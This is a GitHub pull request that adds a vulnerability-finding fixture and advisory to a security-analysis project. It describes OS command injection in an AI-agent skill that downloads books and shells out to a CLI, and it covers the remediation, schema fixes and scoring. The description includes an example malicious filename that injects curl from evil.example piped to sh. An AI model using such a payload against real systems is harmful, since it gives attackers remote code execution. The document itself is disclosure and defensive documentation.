Add finding: OS command injection in an AI-agent skill (zlibrary-to-notebooklm, CWE-78) #122
…otebooklm)

A community-contributed, real-world finding in SEC-AF's verdict/trace/evidence format, demonstrating the OS command-injection class (CWE-78) in AI-agent skills.

The vulnerable project is an MIT-licensed agent "skill" that auto-downloads a book from Z-Library and shells out to the NotebookLM CLI. `download.suggested_filename` (attacker-controllable) flows into f-strings run with subprocess.run(..., shell=True) at 7 sinks -> RCE via a crafted book filename.

Already remediated (list-argv, shell=False); included as an example/fixture, not a live 0-day.

Files:
- exampl/zlibrary-to-notebooklm-command-injection.finding.json (SEC-AF finding schema)
- exampl/zlibrary-to-notebooklm-command-injection.md (readable advisory)
💡 Codex Review
Here are some automated review suggestions for this pull request.
Reviewed commit: 361dda2943
ℹ️ About Codex in GitHub
Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you
- Open a pull request for review
- Mark a draft as ready
- Comment "@codex review".
If Codex has suggestions, it will comment; otherwise it will react with 👍.
Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".
…ifiedFinding

The fixture is advertised as a SEC-AF finding, so consumers must be able to load it with sec_af.schemas.prove.VerifiedFinding. It previously omitted required fields and carried non-schema-shaped nested objects, so VerifiedFinding.model_validate(...) would reject it:

- top-level: add required rationale, sarif_rule_id, sarif_security_severity (+ tags)
- proof: add required exploit_hypothesis, verification_method, evidence_level; fold the non-schema exploit_scenario into exploit_hypothesis and map the payload/outcome onto Proof.exploit_payload / Proof.expected_outcome; data_flow_evidence already matched DataFlowEvidence
- remediation: reshape to RemediationSuggestion (fix_description, patch_diff, confidence) from the prior non-schema summary/before/after/status/notes
- compliance/location were already schema-valid

Add tests/test_example_findings.py: parametrized over exampl/*.finding.json, asserts each loads via VerifiedFinding.model_validate and that proof/remediation, when present, are fully-formed. Guards every example finding, current and future, against schema drift.

Validated locally (pydantic 2.12.5; 2 passed).

Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>
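The guard described in this commit relies on `VerifiedFinding.model_validate`, which is not reproduced here. As a rough, stdlib-only approximation, the sketch below only checks that the required keys named in the commit message are present. The `REQUIRED` table and the `missing_fields` helper are hypothetical, and the check is far weaker than real Pydantic validation (no types, no nested shapes).

```python
# Hypothetical stand-in for the real schema check. Field names come from the
# commit message above; the structure of this helper is an assumption.
REQUIRED = {
    "": ("rationale", "sarif_rule_id", "sarif_security_severity"),
    "proof": ("exploit_hypothesis", "verification_method", "evidence_level"),
    "remediation": ("fix_description", "patch_diff", "confidence"),
}


def missing_fields(finding: dict) -> list[str]:
    """Return dotted paths of required keys that are absent from a finding."""
    missing = []
    for section, keys in REQUIRED.items():
        if section:
            node = finding.get(section)
            if node is None:
                continue  # proof/remediation are only checked when present
            prefix = f"{section}."
        else:
            node, prefix = finding, ""
        missing += [prefix + key for key in keys if key not in node]
    return missing
```

An empty return value means every key listed in the commit message is present; it does not mean the fixture would pass the real schema.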
💡 Codex Review
Here are some automated review suggestions for this pull request.
Reviewed commit: c3c2041228
…engine

The committed example understated the same finding the platform would emit. SEC-AF's own scoring (sec_af.scoring) floors CWE-78 to critical and recomputes exploitability_score = severity x evidence x reachability x chain, mirroring the result into sarif_security_severity (orchestrator.py:383-385). For this confirmed, level-5 RCE whose taint source is a remote attacker-controlled filename, the engine produces: critical (10.0) x EXPLOIT_SCENARIO_VALIDATED (0.9) x externally_reachable (1.0) x no-chain (1.0) = 9.0.

- severity: high -> critical
- exploitability_score: 3.0 -> 9.0
- sarif_security_severity: 8.8 -> 9.0 (mirrors exploitability_score)
- tags: + externally_reachable (the honest reachability bucket - taint enters from a remote, unauthenticated source; without it the engine's non-empty-tag fallback would score 4.5, still understating a confirmed RCE)
- rationale + companion .md updated to match

Strengthen tests/test_example_findings.py with test_example_finding_agrees_with_platform_scoring: re-runs the engine's floor + score pass over every fixture and asserts the stored values equal the recomputation, so an example can never again silently disagree with the platform.

Verified locally: 3 passed (engine recomputes severity=critical, score=9.0).

Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>
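The arithmetic in this commit message can be replayed with a small sketch. It is not the `sec_af.scoring` implementation: the function and table names are hypothetical, only the multipliers quoted above are used, and the 0.5 fallback is inferred from the stated 4.5 result rather than taken from the engine.

```python
# Multipliers quoted in the commit message. The 0.5 fallback is inferred from
# the stated 4.5 score and is an assumption, not a documented constant.
SEVERITY = {"critical": 10.0}
EVIDENCE = {"EXPLOIT_SCENARIO_VALIDATED": 0.9}
REACHABILITY = {"externally_reachable": 1.0}
FALLBACK_REACHABILITY = 0.5  # assumed: non-empty tags, no reachability tag


def exploitability_score(severity, evidence, tags, chain=1.0):
    """Multiply severity x evidence x reachability x chain, rounded to 0.1."""
    reach = next(
        (REACHABILITY[tag] for tag in tags if tag in REACHABILITY),
        FALLBACK_REACHABILITY,
    )
    return round(SEVERITY[severity] * EVIDENCE[evidence] * reach * chain, 1)
```

With `tags=["externally_reachable"]` the product is 10.0 x 0.9 x 1.0 x 1.0; with a tag list that lacks a reachability tag, the assumed fallback halves it.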
What
A community-contributed, real-world finding in SEC-AF's verdict → trace → evidence format, added under `exampl/`:
- `exampl/zlibrary-to-notebooklm-command-injection.finding.json`: structured finding (SEC-AF finding schema: `cwe_id`, `evidence_level`, `proof.data_flow_evidence.steps`, `compliance`, `remediation`, …)
- `exampl/zlibrary-to-notebooklm-command-injection.md`: readable advisory

Why it fits SEC-AF
It demonstrates exactly the class SEC-AF is built to prove: an OS command injection (CWE-78) in an AI-agent skill. The vulnerable project is an MIT-licensed agent "skill" (`zlibrary-to-notebooklm`) that auto-downloads a book from Z-Library and shells out to the NotebookLM CLI.

Confirmed data flow:
`download.suggested_filename` (attacker-controllable: the book uploader sets it) → `download_path` → `title` / `file_path` → f-strings → `subprocess.run(..., shell=True)` at 7 sinks (1 in `convert_to_txt`, 6 in `upload_to_notebooklm`). A book named `'; curl https://evil.example/x.sh | sh; '.epub` yields RCE when the skill processes it. The wrapping single quotes are not a defence, because the quotes inside the filename close them.

Responsible disclosure
The finding is already remediated: all seven sinks were refactored to list-argv with `shell=False`, preserving behaviour (verified: `py_compile` + zero `shell=True`). It is contributed as an example/fixture with the fix included, not a live 0-day.

Verdict
`confirmed` · severity critical · evidence level 5 · CWE-78 · OWASP A03:2021.
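The data flow and the fix described above can be illustrated with a minimal sketch. It does not reproduce the skill's code: `some-cli upload`, `vulnerable_command`, and `run_with_argv` are hypothetical names, the payload is a benign stand-in for the `curl` example, and the vulnerable string is only built, never executed.

```python
import subprocess
import sys

# Benign stand-in for the malicious filename; same quoting trick.
PAYLOAD = "'; echo INJECTED; '.epub"


def vulnerable_command(file_path: str) -> str:
    # Anti-pattern: untrusted text pasted into a string meant for a shell.
    # "some-cli upload" is a placeholder command, not the real CLI call.
    return f"some-cli upload '{file_path}'"


def run_with_argv(file_path: str) -> str:
    # Remediated pattern: list argv with shell=False (the default), so the
    # filename reaches the child process as one literal argument.
    child = "import sys; sys.stdout.write(sys.argv[1])"
    result = subprocess.run(
        [sys.executable, "-c", child, file_path],
        capture_output=True,
        text=True,
        check=True,
    )
    return result.stdout


if __name__ == "__main__":
    print(vulnerable_command(PAYLOAD))
    print(run_with_argv(PAYLOAD) == PAYLOAD)
```

In the string returned by `vulnerable_command`, the payload's leading quote closes the wrapper's opening quote, so a shell would see `; echo INJECTED;` as separate commands. In `run_with_argv` no shell parses the filename, so the child receives it byte for byte.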